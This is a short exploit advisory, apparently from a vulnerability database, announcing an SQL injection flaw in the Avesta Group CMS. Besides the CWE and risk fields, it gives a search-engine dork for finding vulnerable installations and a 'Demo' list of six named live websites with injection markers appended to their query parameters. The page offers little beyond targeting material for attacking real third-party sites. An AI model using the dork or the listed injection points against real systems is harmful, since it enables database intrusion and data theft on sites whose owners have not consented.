Avesta Group CMS SQL Injection Vulnerability

2016.01.25
Credit: snort
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:Developed by Avesta Group & inurl:Direje.aspx?Jimare= & inurl:Content.aspx?LinkID=

################# #Exploit Title : Avesta Group CMS SQL Injection Vulnerability #Exploit Author : snort #Date : 22/Jan/2016 #Home page Link : http://avestagroup.net/ #Website : http://black-hg.org/ #Email :skysnort@gmail.com #Dork :intext:Developed by Avesta Group & inurl:Direje.aspx?Jimare= & inurl:Content.aspx?LinkID= ################ #Demo #http://rojnews.net/Content.aspx?LinkID=16' #http://cpolicesul.com:80/gshty.aspx?Babet=news' #http://www.xendan.org/arabic/Video.aspx?=hewal&jmara=%Inject_Here%13982 #http://naliagroup.com/kurdcity/Direje.aspx?Jimare=1%27 #http://zhyanawe.com:80/Dreje_hewal.aspx?Cor=Kurdistani&Jimare=2348' #http://ieku.org/details_ku.aspx?jimare=303%27 ##################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top